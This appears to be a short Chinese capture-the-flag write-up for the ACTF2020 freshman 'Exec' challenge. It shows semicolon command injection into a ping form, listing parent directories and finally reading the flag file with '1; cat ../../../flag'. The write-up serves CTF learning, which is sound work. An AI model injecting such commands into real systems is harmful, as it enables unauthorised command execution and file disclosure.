[ACTF2020 新生赛]Exec (命令执行漏洞)

打开题目:

[ACTF2020 新生赛]Exec (命令执行漏洞)_第1张图片

ping 一下 1执行:

1; ls

得到:

[ACTF2020 新生赛]Exec (命令执行漏洞)_第2张图片

并没有flag

执行:
 

1; ls ../

再往上看看:

[ACTF2020 新生赛]Exec (命令执行漏洞)_第3张图片

再看看?

执行:

1; ls ../../

[ACTF2020 新生赛]Exec (命令执行漏洞)_第4张图片

有不了一点!

再看看:
执行:
 

1; ls ../../../

[ACTF2020 新生赛]Exec (命令执行漏洞)_第5张图片

OK了家人们看到 flag 了!

执行它!

执行:

1; cat ../../../flag

OK:

[ACTF2020 新生赛]Exec (命令执行漏洞)_第6张图片

flag 来了!

你可能感兴趣的:(CTF,linux,运维,服务器,网络安全)